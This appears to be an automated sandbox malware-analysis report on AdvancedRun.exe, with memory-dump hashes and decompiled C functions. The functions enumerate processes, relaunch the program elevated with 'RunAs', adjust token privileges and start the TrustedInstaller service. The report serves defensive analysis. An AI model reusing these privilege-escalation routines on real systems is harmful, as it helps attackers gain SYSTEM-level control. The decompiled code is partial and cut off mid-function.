                                                                                                                • Source File: 00000000.00000002.850141997.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f77e2e0d2ffcfb1daba9464bb4ae24863f19a1dbd519768d1d58dbb86b0f402e
                                                                                                                • Instruction ID: 08875b261aea47448f7959f3bd78028bafb9d8954295a4cbb38a522f8ca277ad
                                                                                                                • Opcode Fuzzy Hash: f77e2e0d2ffcfb1daba9464bb4ae24863f19a1dbd519768d1d58dbb86b0f402e
                                                                                                                • Instruction Fuzzy Hash: 4D2128B1904240DFDB05CF94D9C0B66BFA5FF88328F2485ADE9494B216C336E856C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0107D3B4, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.850141997.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a759b5f4e5de79ef417c321eb027fab935cdd9db353badc25fdde90700c1178
                                                                                                                • Instruction ID: 42b553bff2dffd5aafdf5919bff2850e17d90b4a09333336dcaf15ca19481fd1
                                                                                                                • Opcode Fuzzy Hash: 2a759b5f4e5de79ef417c321eb027fab935cdd9db353badc25fdde90700c1178
                                                                                                                • Instruction Fuzzy Hash: 9A2125B1904240EFDB05CF94D8C0B6ABBA5FF88324F24C5A9E9491B647C736E856C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0107D49B, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.850141997.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5d57be2b020ab1abc7a7d693afc3fe993d0be9da163d55e114520796abec880
                                                                                                                • Instruction ID: 3ddd348fa11f0c7d5a7873e5ab21c38734ef12ed8fe79e8ca83c1695f7ea4414
                                                                                                                • Opcode Fuzzy Hash: b5d57be2b020ab1abc7a7d693afc3fe993d0be9da163d55e114520796abec880
                                                                                                                • Instruction Fuzzy Hash: 8C11AFB6804280CFDB12CF54D5C4B16BFB2FB84324F2886A9D9454B657C336D456CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0107D3AF, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.850141997.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5d57be2b020ab1abc7a7d693afc3fe993d0be9da163d55e114520796abec880
                                                                                                                • Instruction ID: cc9b8a5550cf1340c9775d1b0ea2deeb45e938f45939eaaefa062fab02765a25
                                                                                                                • Opcode Fuzzy Hash: b5d57be2b020ab1abc7a7d693afc3fe993d0be9da163d55e114520796abec880
                                                                                                                • Instruction Fuzzy Hash: F011AF76804280DFDB12CF54D9C4B56BFB1FB84324F28C6A9D8490B656C336E456CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 02D19BA8, Relevance: .3, Instructions: 265COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd20a87fb59a1ec257a3d2d129f701c3ea0cc872456c47407222850aa5964aa2
                                                                                                                • Instruction ID: 89a25165892cbcc0594d212c168adc5907c591ab027c3a4fd396275db39f8fdf
                                                                                                                • Opcode Fuzzy Hash: bd20a87fb59a1ec257a3d2d129f701c3ea0cc872456c47407222850aa5964aa2
                                                                                                                • Instruction Fuzzy Hash: 08A15536E00219EFCF05DFA5D8945DEBBB2FF84304B15856AE805AB260EB31AD55CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: AdvancedRun.exe PID: 5008 Parent PID: 2016 AdvancedRun.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                0x00409609
                                                                                                                0x0040960f
                                                                                                                0x00409619
                                                                                                                0x00409623
                                                                                                                0x0040962e
                                                                                                                0x00409633
                                                                                                                0x00409640
                                                                                                                0x0040964a
                                                                                                                0x00409782
                                                                                                                0x0040978c
                                                                                                                0x00409793
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040965a
                                                                                                                0x0040965f
                                                                                                                0x00409678
                                                                                                                0x0040967e
                                                                                                                0x00409681
                                                                                                                0x00409685
                                                                                                                0x00409688
                                                                                                                0x004096b2
                                                                                                                0x004096bf
                                                                                                                0x004096c6
                                                                                                                0x004096cb
                                                                                                                0x004096da
                                                                                                                0x004096e6
                                                                                                                0x0040973b
                                                                                                                0x00409747
                                                                                                                0x0040975f
                                                                                                                0x00409764
                                                                                                                0x0040976a
                                                                                                                0x00409770
                                                                                                                0x00409773
                                                                                                                0x0040977d
                                                                                                                0x00000000
                                                                                                                0x0040977d
                                                                                                                0x004096ee
                                                                                                                0x004096f5
                                                                                                                0x004096fc
                                                                                                                0x00409704
                                                                                                                0x0040970c
                                                                                                                0x0040971c
                                                                                                                0x0040971c
                                                                                                                0x00409704
                                                                                                                0x00409721
                                                                                                                0x00409728
                                                                                                                0x00409739
                                                                                                                0x00409739
                                                                                                                0x00000000
                                                                                                                0x00409728
                                                                                                                0x00409693
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096a5
                                                                                                                0x004096a9
                                                                                                                0x004096ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096ac
                                                                                                                0x004097a6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                0x00401c31
                                                                                                                0x00401c33
                                                                                                                0x00401c48
                                                                                                                0x00401c4f
                                                                                                                0x00401c61
                                                                                                                0x00401c68
                                                                                                                0x00401c74
                                                                                                                0x00401c79
                                                                                                                0x00401c7a
                                                                                                                0x00401c7b
                                                                                                                0x00401c84
                                                                                                                0x00401c89
                                                                                                                0x00401c8e
                                                                                                                0x00401c8f
                                                                                                                0x00401c9b
                                                                                                                0x00401ca6
                                                                                                                0x00401caf
                                                                                                                0x00401cb9
                                                                                                                0x00401cc0
                                                                                                                0x00401cc7
                                                                                                                0x00401cce
                                                                                                                0x00401cd5
                                                                                                                0x00401cdd
                                                                                                                0x00401ce0
                                                                                                                0x00401d14
                                                                                                                0x00401ce2
                                                                                                                0x00401ce8
                                                                                                                0x00401cf3
                                                                                                                0x00401cf6
                                                                                                                0x00401cfe
                                                                                                                0x00401d09
                                                                                                                0x00401d09
                                                                                                                0x00401cfe
                                                                                                                0x00401d1b

                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                0x00408fc9
                                                                                                                0x00408fd0
                                                                                                                0x00408fe8
                                                                                                                0x00000000
                                                                                                                0x00408fea
                                                                                                                0x00408ff4
                                                                                                                0x00409001
                                                                                                                0x00409003
                                                                                                                0x0040900c
                                                                                                                0x0040900e
                                                                                                                0x00409010
                                                                                                                0x0040901a
                                                                                                                0x0040901a
                                                                                                                0x00409010
                                                                                                                0x0040901f
                                                                                                                0x00409026
                                                                                                                0x0040902d
                                                                                                                0x00409030
                                                                                                                0x00409035
                                                                                                                0x00409037
                                                                                                                0x00409040
                                                                                                                0x00409042
                                                                                                                0x00409044
                                                                                                                0x00409051
                                                                                                                0x00409051
                                                                                                                0x00409044
                                                                                                                0x00409053
                                                                                                                0x0040905e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                0x00401319
                                                                                                                0x0040131b
                                                                                                                0x00401327
                                                                                                                0x0040132b
                                                                                                                0x0040133a
                                                                                                                0x0040134b
                                                                                                                0x0040134b
                                                                                                                0x0040134e
                                                                                                                0x0040134e
                                                                                                                0x00401353
                                                                                                                0x0040135b

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                0x0040a348
                                                                                                                0x0040a34e
                                                                                                                0x0040a352
                                                                                                                0x0040a35f
                                                                                                                0x0040a363
                                                                                                                0x0040a369
                                                                                                                0x0040a371
                                                                                                                0x0040a374
                                                                                                                0x0040a37c
                                                                                                                0x0040a380
                                                                                                                0x0040a383
                                                                                                                0x0040a386
                                                                                                                0x0040a388
                                                                                                                0x0040a388
                                                                                                                0x0040a38c
                                                                                                                0x0040a38f
                                                                                                                0x0040a39f
                                                                                                                0x0040a3a1
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a9
                                                                                                                0x0040a3aa
                                                                                                                0x0040a3b3
                                                                                                                0x0040a3b3
                                                                                                                0x0040a37c
                                                                                                                0x0040a371
                                                                                                                0x0040a3b8
                                                                                                                0x0040a3be

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
